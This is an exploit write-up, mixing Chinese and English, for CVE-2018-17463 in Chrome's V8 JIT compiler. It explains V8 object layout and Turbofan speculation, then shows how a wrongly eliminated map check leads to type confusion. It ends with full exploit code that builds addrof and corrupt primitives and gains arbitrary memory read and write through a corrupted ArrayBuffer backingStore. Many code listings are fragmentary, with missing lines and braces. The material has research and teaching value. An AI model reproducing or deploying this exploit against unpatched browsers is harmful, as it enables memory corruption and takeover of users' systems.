Exploiting Logic Bugs in JavaScript JIT Engines
0 - Introduction
1 - V8 Overview
1.1 - Values
1.2 - Maps
1.3 - Object Summary
2 - An Introduction to Just-in-Time Compilation for JavaScript
2.1 - Speculative Just-in-Time Compilation
2.2 - Speculation Guards
2.3 - Turbofan
2.4 - Compiler Pipeline
2.5 - A JIT Compilation Example
3 - JIT Compiler Vulnerabilities
3.1 - Redundancy Elimination
3.2 - CVE-2018-17463
4 - Exploitation
4.1 - Constructing Type Confusions
4.2 - Gaining Memory Read/Write
4.3 - Reflections
4.4 - Gaining Code Execution
5 - References
6 - Exploit Code
0. - 介绍
本文以CVE-2018-17463漏洞为例,介绍了JIT编译器漏洞的相关知识,这个漏洞是在对源码进行review的时候发现的,之后被google官方修复。漏洞利用脚本在chrome version 69.0.3497.81 (64-bit), corresponding to v8 version 6.9.427.19 可以复现。
1. - V8 概述
通过d8 (v8的JavaScript shell)的——enable-native -syntax标志启用了许多可从JavaScript使用的内置函数。例如,允许用户通过%DebugPrint检查对象,使用%CollectGarbage触发垃圾收集,或者通过%OptimizeFunctionOnNextCall强制JIT编译函数
tools/子目录中的其他工具,比如JIT IR的可视化工具turbolizer。
// Inheritance hierarchy:
// - Object
// - Smi (immediate small integer)
// - HeapObject (superclass for everything allocated in the heap)
// - JSReceiver (suitable for property access)
// - JSObject
// - Name
// - String
// - HeapNumber
// - Map
// ...
Smi: [32 bit signed int] [31 bits unused] 0
HeapObject: [64 bit direct pointer] | 01
1.2 - Maps
对象的动态类型,即String, Uint8Array, HeapNumber,…
let o1 = {a: 42, b: 43};
let o2 = {a: 1337, b: 1338};
| |
| map1 |
| |
| property: slot |
| .a : 0 |
| .b : 1 |
| |
^ ^
+--------------+ | |
| +------+ |
| o1 | +--------------+
| | | |
| slot : value | | o2 |
| 0 : 42 | | |
| 1 : 43 | | slot : value |
+--------------+ | 0 : 1337 |
| 1 : 1338 |
由于map在内存使用方面是相对昂贵的对象,所以它们在“相似”对象之间尽可能多地共享。这可以在前面的示例中看到,其中o1和o2共享相同的Map map1。但是,如果在o1中添加了第三个属性.c(例如值为1339),那么就不能再共享映射,因为o1和o2现在拥有不同的属性。因此,为o1创建了一个新的映射:
+----------------+ +----------------+
| | | |
| map1 | | map2 |
| | | |
| property: slot | | property: slot |
| .a : 0 | | .a : 0 |
| .b : 1 | | .b : 1 |
| | | .c : 2 |
+----------------+ +----------------+
^ ^
| |
| |
+--------------+ +--------------+
| | | |
| o2 | | o1 |
| | | |
| slot : value | | slot : value |
| 0 : 1337 | | 0 : 1337 |
| 1 : 1338 | | 1 : 1338 |
+--------------+ | 2 : 1339 |
1.3 - Object Summary
let obj = {
x: 0x41,
y: 0x42
obj.z = 0x43;
obj[0] = 0x1337;
obj[1] = 0x1338;
(lldb) x/5gx 0x23ad7c58e0e8
0x23ad7c58e0e8: 0x000023adbcd8c751 0x000023ad7c58e201
0x23ad7c58e0f8: 0x000023ad7c58e229 0x0000004100000000
0x23ad7c58e108: 0x0000004200000000
(lldb) x/3gx 0x23ad7c58e200
0x23ad7c58e200: 0x000023adafb038f9 0x0000000300000000
0x23ad7c58e210: 0x0000004300000000
(lldb) x/6gx 0x23ad7c58e228
0x23ad7c58e228: 0x000023adafb028b9 0x0000001100000000
0x23ad7c58e238: 0x0000133700000000 0x0000133800000000
0x23ad7c58e248: 0x000023adafb02691 0x000023adafb02691
首先是对象本身由一个指向它的map(0 x23adbcd8c751),其out-of-line指针属性(0x23ad7c58e201),指针指向的元素(0x23ad7c58e229),和两个内联属性(x, y)
2 - Just-in-Time编译介绍
2.1 - Speculative Just-in-Time Compilation
// C++
int add(int a, int b) {
return a + b;
// JavaScript
function add(a, b) {
return a + b;
lea eax, [rdi + rsi]
function add(a: Smi, b: Smi) -> Smi {
return a + b;
In this case, it is again rather easy to produce machine code:
lea rax, [rdi+rsi]
jo bailout_integer_overflow
这是可能的,因为由于指针标记方案,Smi的下32位都是0。这个汇编代码看起来与c++示例非常相似,除了额外的溢出检查,这是必需的,因为JavaScript不知道整数溢出(在规范中所有数字都是IEEE 754双精度浮点数),但是cpu当然知道。因此,在不太可能出现整数溢出的情况下,引擎将不得不将执行转移到不同的、更通用的执行层,比如解释器。在这里,它将重复失败的操作,在本例中,在将两个输入相加之前,将它们转换为浮点数。这种机制通常称为紧急援助,对于JIT编译器非常重要,因为它允许编译器生成专门的代码,如果发生意外情况,这些代码总是可以返回到更通用的代码
不幸的是,对于纯JavaScript, JIT编译器没有静态类型信息的舒适感。但是,由于JIT编译只发生在较低级别的几次执行之后,比如解释器,JIT编译器可以使用以前执行的类型信息。这反过来又支持推测性优化:编译器将假设将来以类似的方式使用代码单元,从而看到相同的类型,例如参数。然后,它可以生成如上所示的优化代码,假设将来会使用这些类型。
2.2 - Speculation Guards
; Ensure is Smi
test rdi, 0x1
jnz bailout
; Ensure has expected Map
cmp QWORD PTR [rdi-0x1], 0x12345601
jne bailout
2.3 - Turbofan
control-flow edges, connecting control-flow operations such as loops and if conditions
data-flow edges, connecting input and output values
effect-flow edges, 将有效的操作连接起来,以便正确地安排它们。例如:考虑存储到属性,然后加载相同的属性。由于这两个操作之间不存在数据流或控制流依赖关系,因此需要effect-flow在加载之前正确地调度存储。
此外,turbofan IR支持三种不同类型的操作:JavaScript操作、简化操作和机器操作。机器操作通常类似于单个机器指令,而JS操作类似于通用字节码指令。简化操作介于两者之间。因此,机器操作可以直接转换成机器指令,而其他两种类型的操作需要进一步转换为更低级的操作(称为降低)。例如,可以将泛型属性加载操作降低到CheckHeapObject和checkmap操作,然后从对象的内联slot加载8字节。
2.4 - Compiler Pipeline
根据前面描述的机制,典型的JavaScript JIT compiler大致如下:
2.5 - A JIT Compilation Example
This chapter is concluded with an example of the following function being JIT compiled by turbofan:
function foo(o) {
return o.b;
During parsing, the function would first be compiled to generic bytecode, which can be inspected using the --print-bytecode flag for d8. The output is shown below.
Parameter count 2
Frame size 0
12 E> 0 : a0 StackCheck
31 S> 1 : 28 02 00 00 LdaNamedProperty a0, [0], [0]
33 S> 5 : a4 Return
Constant pool (size = 1)
0x1fbc69c24ad9: [FixedArray] in OldSpace
- map: 0x1fbc6ec023c1 <Map>
- length: 1
0: 0x1fbc69c24301 <String[1]: b>
The function is mainly compiled to two operations: LdaNamedProperty, which loads property .b of the provided argument, and Return, which returns said property. The StackCheck operation at the beginning of the function guards against stack overflows by throwing an exception if the call stack size is exceeded. More information about v8's bytecode format and interpreter can be found online [7].
To trigger JIT compilation, the function has to be invoked several times:
for (let i = 0; i < 100000; i++) {
foo({a: 42, b: 43});
/* Or by using a native after providing some type information: */
foo({a: 42, b: 43});
foo({a: 42, b: 43});
foo({a: 42, b: 43});
This will also inhabit the feedback vector of the function which associates observed input types with bytecode operations. In this case, the feedback vector entry for the LdaNamedProperty would contain a single entry: the Map of the objects that were given to the function as argument. This Map will indicate that property .b is stored in the second inline slot.
Once turbofan starts compiling, it will build a graph representation of the JavaScript code. It will also inspect the feedback vector and, based on that, speculate that the function will always be called with an object of a
specific Map. Next, it guards these assumptions with two runtime checks, which will bail out to the interpreter if the assumptions ever turn out to be false, then proceeds to emit a property load for an inline property. The optimized graph will ultimately look similar to the one shown below. Here, only data-flow edges are shown.
| |
| Parameter[1] |
| |
| +-------------------+
| | |
+-------------------> CheckHeapObject |
| |
+------------+ |
| | |
| CheckMap <-----------------------+
| |
| +------------------+
| | |
+-------------------> LoadField[+32] |
| |
+----------+ |
| | |
| Return <------------------------+
| |
This graph will then be lowered to machine code similar to the following.
; Ensure o is not a Smi
test rdi, 0x1
jz bailout_not_object
; Ensure o has the expected Map
cmp QWORD PTR [rdi-0x1], 0xabcd1234
jne bailout_wrong_map
; Perform operation for object with known Map
mov rax, [rdi+0x1f]
If the function were to be called with an object with a different Map, the second guard would fail, causing a bailout to the interpreter (more precisely to the LdaNamedProperty operation of the bytecode) and likely the discarding of the compiled code. Eventually, the function would be recompiled to take the new type feedback into account. In that case, the function would be re-compiled to perform a polymorphic property load (supporting more than one input type), e.g. by emitting code for the property load for both Maps, then jumping to the respective one depending on the current Map. If the operation becomes even more polymorphic, the compiler might decide to use a generic inline cache (IC) [8][9] for the polymorphic operation. An IC caches previous lookups but can always fall-back to the runtime function for previously unseen input types without bailing out of the JIT code.
3 - JIT Compiler 漏洞
JavaScript JIT编译器通常在c++中实现,因此受到内存和类型安全违规的常见列表的约束。这些并不是特定于JIT编译器的,因此不会进一步讨论。相反,重点将放在编译器中的bug上,这些bug会导致不正确的机器码生成,然后可以利用这些错误导致内存损坏。
每一次优化都会产生自己的漏洞。在审计复杂的软件(如JIT编译器)时,提前确定特定的漏洞模式并查找它们的实例通常是一种明智的方法。这也是手工代码审计的一个好处:知道特定类型的错误通常会导致简单、可靠的利用 这是审计人员可以专门寻找的。
因此,接下来将讨论一个具体的优化,即 Redundancy Elimination,以及可以找到的漏洞类型和一个具体的漏洞,CVE-2018-17463
3.1 - Redundancy Elimination
One popular class of optimizations aims to remove safety checks from the emitted machine code if they are determined to be unnecessary. As can be imagined, these are very interesting for the auditor as a bug in those will usually result in some kind of type confusion or out-of-bounds access.
One instance of these optimization passes, often called "redundancy elimination", aims to remove redundant type checks. As an example, consider the following code:
function foo(o) {
return o.a + o.b;
Following the JIT compilation approach outlined in chapter 2, the following IR code might be emitted for it:
CheckHeapObject o
CheckMap o, map1
r0 = Load [o + 0x18]
CheckHeapObject o
CheckMap o, map1
r1 = Load [o + 0x20]
r2 = Add r0, r1
Return r2
3.2 - CVE-2018-17463
In v8, IR operations have various flags associated with them. One of them, kNoWrite, indicates that the engine assumes that an operation will not have observable side-effects, it does not "write" to the effect chain. An example for such an operation was JSCreateObject, shown below:
#define CACHED_OP_LIST(V) \
... \
V(CreateObject, Operator::kNoWrite, 1, 1) \
To determine whether an IR operation might have side-effects it is often necessary to look at the lowering phases which convert high-level operations, such as JSCreateObject, into lower-level instruction and eventually machine instructions. For JSCreateObject, the lowering happens in js-generic-lowering.cc, responsible for lowering JS operations:
void JSGenericLowering::LowerJSCreateObject(Node* node) {
CallDescriptor::Flags flags = FrameStateFlagForCall(node);
Callable callable = Builtins::CallableFor(
isolate(), Builtins::kCreateObjectWithoutProperties);
ReplaceWithStubCall(node, callable, flags);
let o = {a: 42};
Indeed, running it with `d8 --allow-natives-syntax` shows:
DebugPrint: 0x3447ab8f909: [JS_OBJECT_TYPE]
- map: 0x0344c6f02571 <Map(HOLEY_ELEMENTS)> [FastProperties]
DebugPrint: 0x3447ab8f909: [JS_OBJECT_TYPE]
- map: 0x0344c6f0d6d1 <Map(HOLEY_ELEMENTS)> [DictionaryProperties]
可以看到,对象的映射在成为原型时发生了变化,所以对象也一定以某种方式发生了变化。特别是,当成为原型时,对象的out- line属性存储被转换为dictionary模式。因此,位于对象偏移量8处的指针将不再指向PropertyArray(all properties one after each other, after a short header),而是指向NameDictionary(更复杂的数据结构,直接将属性名映射到值,而不依赖于映射)。这当然是一个副作用,在这种情况下,这对于JIT编译器来说是一个意想不到的副作用。Map更改的原因是在v8中,由于引擎[19]的其他部分使用了优化技巧,所以原型映射从来没有共享过。
At this point it is time to construct a first proof-of-concept for the bug. The requirements to trigger an observable misbehavior in a compiled function are:
0. The function must receive an object that is not currently used as a
1. The function needs to perform a CheckMap operation so that
subsequent ones can be eliminated.
2. The function needs to call Object.create with the object as argument
to trigger the Map transition.
3. The function needs to access an out-of-line property. This will,
after a CheckMap that will later be incorrectly eliminated, load the
pointer to the property storage, then deference that believing that it
is pointing to a PropertyArray even though it will point to a
The following JavaScript code snippet accomplishes this:
function hax(o) {
// Force a CheckMaps node.
// Cause unexpected side-effects.
// Trigger type-confusion because CheckMaps node is removed.
return o.b;
for (let i = 0; i < 100000; i++) {
let o = {a: 42};
o.b = 43; // will be stored out-of-line.
It will first be compiled to pseudo IR code similar to the following:
CheckHeapObject o
CheckMap o, map1
Load [o + 0x18]
// Changes the Map of o
Call CreateObjectWithoutProperties, o
CheckMap o, map1
r1 = Load [o + 0x8] // Load pointer to out-of-line properties
r2 = Load [r1 + 0x10] // Load property value
Return r2
Afterwards, the redundancy elimination pass will incorrectly remove the second Map check, yielding:
CheckHeapObject o
CheckMap o, map1
Load [o + 0x18]
// Changes the Map of o
Call CreateObjectWithoutProperties, o
r1 = Load [o + 0x8]
r2 = Load [r1 + 0x10]
Return r2
When this JIT code is run for the first time, it will return a different value than 43, namely an internal fields of the NameDictionary which happens to be located at the same offset as the .b property in the PropertyArray. Note that in this case, the JIT compiler tried to infer the type of the argument object at the second property load instead of relying on the type feedback and thus, assuming the map wouldn’t change after the first type check, produced a property load from a FixedArray instead of a NameDictionary.
4 - Exploitation 利用
The bug at hand allows the confusion of a PropertyArray with a NameDictionary. Interestingly, the NameDictionary still stores the property values inside a dynamically sized inline buffer of (name, value, flags) triples. As such, there likely exists a pair of properties P1 and P2 such that both P1 and P2 are located at offset O from the start of either the PropertyArray or the NameDictionary respectively. This is interesting forreasons explained in the next section. Shown next is the memory dump of the PropertyArray and NameDictionary for the same properties side by side:
let o = {inline: 42};
o.p0 = 0; o.p1 = 1; o.p2 = 2; o.p3 = 3; o.p4 = 4;
o.p5 = 5; o.p6 = 6; o.p7 = 7; o.p8 = 8; o.p9 = 9;
0x0000130c92483e89 0x0000130c92483bb1
0x0000000c00000000 0x0000006500000000
0x0000000000000000 0x0000000b00000000
0x0000000100000000 0x0000000000000000
0x0000000200000000 0x0000002000000000
0x0000000300000000 0x0000000c00000000
0x0000000400000000 0x0000000000000000
0x0000000500000000 0x0000130ce98a4341
0x0000000600000000 <-!-> 0x0000000200000000
0x0000000700000000 0x000004c000000000
0x0000000800000000 0x0000130c924826f1
0x0000000900000000 0x0000130c924826f1
... ...
In this case the properties p6 and p2 overlap after the conversion to dictionary mode. Unfortunately, the layout of the NameDictionary will be different in every execution of the engine due to some process-wide
randomness being used in the hashing mechanism. It is thus necessary to first find such a matching pair of properties at runtime. The following code can be used for that purpose.
function find_matching_pair(o) {
let a = o.inline;
let p0 = o.p0;
let p1 = o.p1;
return [p0, p1, ..., pN];
let pN = o.pN;
4.1 - Constructing Type Confusions
There is an important bit about v8 that wasn't discussed yet. Besides the location of property values, Maps also store type information for properties. Consider the following piece of code:
let o = {}
o.a = 1337;
o.b = {x: 42};
After executing it in v8, the Map of o will indicate that the property .a will always be a Smi while property .b will be an Object with a certain Map that will in turn have a property .x of type Smi. In that case, compiling a
function such as
function foo(o) {
return o.b.x;
function vuln(o) {
// Force a CheckMaps node
let a = o.inline;
// Trigger unexpected transition of property storage
// Seemingly load .p1 but really load .p2
let p = o.${p1};
// Use p (known to be of type X but really is of type Y)
// ...;
let arg = makeObj();
arg[p1] = objX;
arg[p2] = objY;
In the JIT compiled function, the compiler will then know that the local variable p will be of type X due to the Map of o and will thus omit type checks for it. However, due to the vulnerability, the runtime code will actually receive an object of type Y, causing a type confusion.
4.2 - Gaining Memory Read/Write
From here, additional exploit primitives will now be constructed: first a primitive to leak the addresses of JavaScript objects, second a primitive to overwrite arbitrary fields in an object. The address leak is possible by confusing the two objects in a compiled piece of code which fetches the .x property, an unboxed double, converts it to a v8 HeapNumber, and returns that to the caller. Due to the vulnerability, it will, however, actually load a pointer to an object and return that as a double.
function vuln(o) {
let a = o.inline;
return o.${p1}.x1;
let arg = makeObj();
arg[p1] = {x: 13.37}; // X, inline property is an unboxed double
arg[p2] = {y: obj}; // Y, inline property is a pointer
This code will result in the address of obj being returned to the caller as a double, such as 1.9381218278403e-310. Next, the corruption. As is often the case, the "write" primitive is just the inversion of the "read" primitive. In this case, it suffices to write to a property that is expected to be an unboxed double, such as shown next.
function vuln(o) {
let a = o.inline;
let orig = o.${p1}.x2;
o.${p1}.x = ${newValue};
return orig;
This will "corrupt" property .y of the second object with a controlled double. However, to achieve something useful, the exploit would likely need to corrupt an internal field of an object, such as is done below for an ArrayBuffer. Note that the second primitive will read the old value of the property and return that to the caller. This makes it possible to:
* immediately detect once the vulnerable code ran for the first time
and corrupted the victim object
* fully restore the corrupted object at a later point to guarantee
clean process continuation.
With those primitives at hand, gaining arbitrary memory read/write becomes as easy as
0. Creating two ArrayBuffers, ab1 and ab2
1. Leaking the address of ab2
2. Corrupting the backingStore pointer of ab1 to point to ab2
+-----------------+ +-----------------+
| ArrayBuffer 1 | +---->| ArrayBuffer 2 |
| | | | |
| map | | | map |
| properties | | | properties |
| elements | | | elements |
| byteLength | | | byteLength |
| backingStore --+-----+ | backingStore |
| flags | | flags |
+-----------------+ +-----------------+
Afterwards, arbitrary addresses can be accessed by overwriting the ackingStore pointer of ab2 by writing into ab1 and subsequently reading from or writing to ab2.
4.3 - Reflections
As was demonstrated, by abusing the type inference system in v8, an initially limited type confusion primitive can be extended to achieve confusion of arbitrary objects in JIT code. This primitive is powerful for several reasons:
0. 用户能够创建自定义类型,例如,通过向对象添加属性。这避免了寻找好的类型混淆候选项的需要,因为您可以直接创建它,就像前面介绍的漏洞所做的那样,它将ArrayBuffer与具有内联属性的对象混淆,从而破坏backingStore指针。
1. 可以对类型为X的对象执行任意操作,但在运行时由于该漏洞接收类型为Y的对象的代码可以被JIT编译。提出了利用编译对unboxed double属性的加载和存储来分别达到arraybuffer的leaks和corruption目的。
2. 类型信息被引擎积极跟踪的事实,增加了可能彼此混淆的类型的数量。
4.4 Gaining Code Execution
While previously an attacker could simply write shellcode into the JIT region and execute it, things have become slightly more time consuming: in early 2018, v8 introduced a feature called write-protect-code-memory [20] which essentially flips the JIT region's access permissions between R-X and RW-. With that, the
JIT region will be mapped as R-X during execution of JavaScript code, thus preventing an attacker from directly writing into it. As such, one now needs to find another way to code execution, such as simply performing ROP by overwriting vtables, JIT function pointers, the stack, or through another method of one's choosing. This is left as an exercise for the reader. Afterwards, the only thing left to do is to run a sandbox escape... ;)
5 - References
[1] https://blogs.securiteam.com/index.php/archives/3783
[2] https://cs.chromium.org/
[3] https://v8.dev/
[4] https://www.ecma-international.org/ecma-262/8.0/
[5] https://www.ecma-international.org/ecma-262/8.0/
[6] https://chromium.googlesource.com/v8/v8.git/+/6.9.427.19/
[7] https://v8.dev/docs/ignition
[8] https://www.mgaudet.ca/technical/2018/6/5/
[9] https://mathiasbynens.be/notes/shapes-ics
[10] https://bugs.chromium.org/p/project-zero/issues/detail?id=1380
[11] https://github.com/WebKit/webkit/commit/
[12] https://bugzilla.mozilla.org/show_bug.cgi?id=1145255
[13] https://www.thezdi.com/blog/2017/8/24/
[14] https://bugs.chromium.org/p/chromium/issues/detail?id=762874
[15] https://bugs.chromium.org/p/project-zero/issues/detail?id=1390
[17] https://bugs.chromium.org/p/project-zero/issues/detail?id=1396
[16] https://cloudblogs.microsoft.com/microsoftsecure/2017/10/18/
[18] https://www.mozilla.org/en-US/security/advisories/
[19] https://mathiasbynens.be/notes/prototypes
[20] https://github.com/v8/v8/commit/
6 - Exploit Code
if (typeof(window) !== 'undefined') {
print = function(msg) {
document.body.textContent += msg + "\r\n";
// Conversion buffers.
let floatView = new Float64Array(1);
let uint64View = new BigUint64Array(floatView.buffer);
let uint8View = new Uint8Array(floatView.buffer);
// Feature request: unboxed BigInt properties so these aren't needed =)
Number.prototype.toBigInt = function toBigInt() {
floatView[0] = this;
return uint64View[0];
BigInt.prototype.toNumber = function toNumber() {
uint64View[0] = this;
return floatView[0];
// Garbage collection is required to move objects to a stable position in
// memory (OldSpace) before leaking their addresses.
function gc() {
for (let i = 0; i < 100; i++) {
new ArrayBuffer(0x100000);
const NUM_PROPERTIES = 32;
const MAX_ITERATIONS = 100000;
function checkVuln() {
function hax(o) {
// Force a CheckMaps node before the property access. This must
// load an inline property here so the out-of-line properties
// pointer cannot be reused later.
// Turbofan assumes that the JSCreateObject operation is
// side-effect free (it has the kNoWrite property). However, if the
// prototype object (o in this case) is not a constant, then
// JSCreateObject will be lowered to a runtime call to
// CreateObjectWithoutProperties. This in turn eventually calls
// JSObject::OptimizeAsPrototype which will modify the prototype
// object and assign it a new Map. In particular, it will
// transition the OOL property storage to dictionary mode.
// The CheckMaps node for this property access will be incorrectly
// removed. The JIT code is now accessing a NameDictionary but
// believes its loading from a FixedArray.
return o.outOfLine;
for (let i = 0; i < MAX_ITERATIONS; i++) {
let o = {inline: 0x1337};
o.outOfLine = 0x1338;
let r = hax(o);
if (r !== 0x1338) {
throw "Not vulnerable"
// Make an object with one inline and numerous out-of-line properties.
function makeObj(propertyValues) {
let o = {inline: 0x1337};
for (let i = 0; i < NUM_PROPERTIES; i++) {
Object.defineProperty(o, 'p' + i, {
writable: true,
value: propertyValues[i]
return o;
// The 3 exploit primitives.
// Find a pair (p1, p2) of properties such that p1 is stored at the same
// offset in the FixedArray as p2 is in the NameDictionary.
let p1, p2;
function findOverlappingProperties() {
let propertyNames = [];
for (let i = 0; i < NUM_PROPERTIES; i++) {
propertyNames[i] = 'p' + i;
function hax(o) {
${propertyNames.map((p) => `let ${p} = o.${p};`).join('\n')}
return [${propertyNames.join(', ')}];
let propertyValues = [];
for (let i = 1; i < NUM_PROPERTIES; i++) {
// There are some unrelated, small-valued SMIs in the dictionary.
// However they are all positive, so use negative SMIs. Don't use
// -0 though, that would be represented as a double...
propertyValues[i] = -i;
for (let i = 0; i < MAX_ITERATIONS; i++) {
let r = hax(makeObj(propertyValues));
for (let i = 1; i < r.length; i++) {
// Properties that overlap with themselves cannot be used.
if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {
[p1, p2] = [i, -r[i]];
throw "Failed to find overlapping properties";
// Return the address of the given object as BigInt.
function addrof(obj) {
// Confuse an object with an unboxed double property with an object
// with a pointer property.
function hax(o) {
return o.p${p1}.x1;
let propertyValues = [];
// Property p1 should have the same Map as the one used in
// corrupt for simplicity.
propertyValues[p1] = {x1: 13.37, x2: 13.38};
propertyValues[p2] = {y1: obj};
for (let i = 0; i < MAX_ITERATIONS; i++) {
let res = hax(makeObj(propertyValues));
if (res !== 13.37) {
// Adjust for the LSB being set due to pointer tagging.
return res.toBigInt() - 1n;
throw "Addrof failed";
// Corrupt the backingStore pointer of an ArrayBuffer object and return the
// original address so the ArrayBuffer can later be repaired.
function corrupt(victim, newValue) {
function hax(o) {
let orig = o.p${p1}.x2;
o.p${p1}.x2 = ${newValue.toNumber()};
return orig;
let propertyValues = [];
// x2 overlaps with the backingStore pointer of the ArrayBuffer.
let o = {x1: 13.37, x2: 13.38};
propertyValues[p1] = o;
propertyValues[p2] = victim;
for (let i = 0; i < MAX_ITERATIONS; i++) {
o.x2 = 13.38;
let r = hax(makeObj(propertyValues));
if (r !== 13.38) {
return r.toBigInt();
throw "CorruptArrayBuffer failed";
function pwn() {
// Step 0: verify that the engine is vulnerable.
print("[+] v8 version is vulnerable");
// Step 1. determine a pair of overlapping properties.
print(`[+] Properties p${p1} and p${p2} overlap`);
// Step 2. leak the address of an ArrayBuffer.
let memViewBuf = new ArrayBuffer(1024);
let driverBuf = new ArrayBuffer(1024);
// Move ArrayBuffer into old space before leaking its address.
let memViewBufAddr = addrof(memViewBuf);
print(`[+] ArrayBuffer @ 0x${memViewBufAddr.toString(16)}`);
// Step 3. corrupt the backingStore pointer of another ArrayBuffer to
// point to the first ArrayBuffer.
let origDriverBackingStorage = corrupt(driverBuf, memViewBufAddr);
let driver = new BigUint64Array(driverBuf);
let origMemViewBackingStorage = driver[4];
// Step 4. construct the memory read/write primitives.
let memory = {
write(addr, bytes) {
driver[4] = addr;
let memview = new Uint8Array(memViewBuf);
read(addr, len) {
driver[4] = addr;
let memview = new Uint8Array(memViewBuf);
return memview.subarray(0, len);
read64(addr) {
driver[4] = addr;
let memview = new BigUint64Array(memViewBuf);
return memview[0];
write64(addr, ptr) {
driver[4] = addr;
let memview = new BigUint64Array(memViewBuf);
memview[0] = ptr;
addrof(obj) {
memViewBuf.leakMe = obj;
let props = this.read64(memViewBufAddr + 8n);
return this.read64(props + 15n) - 1n;
fixup() {
let driverBufAddr = this.addrof(driverBuf);
this.write64(driverBufAddr + 32n, origDriverBackingStorage);
this.write64(memViewBufAddr + 32n, origMemViewBackingStorage);
print("[+] Constructed memory read/write primitive");
// Read from and write to arbitrary addresses now :)
memory.write64(0x41414141n, 0x42424242n);
// All done here, repair the corrupted objects.
// Verify everything is stable.
if (typeof(window) === 'undefined')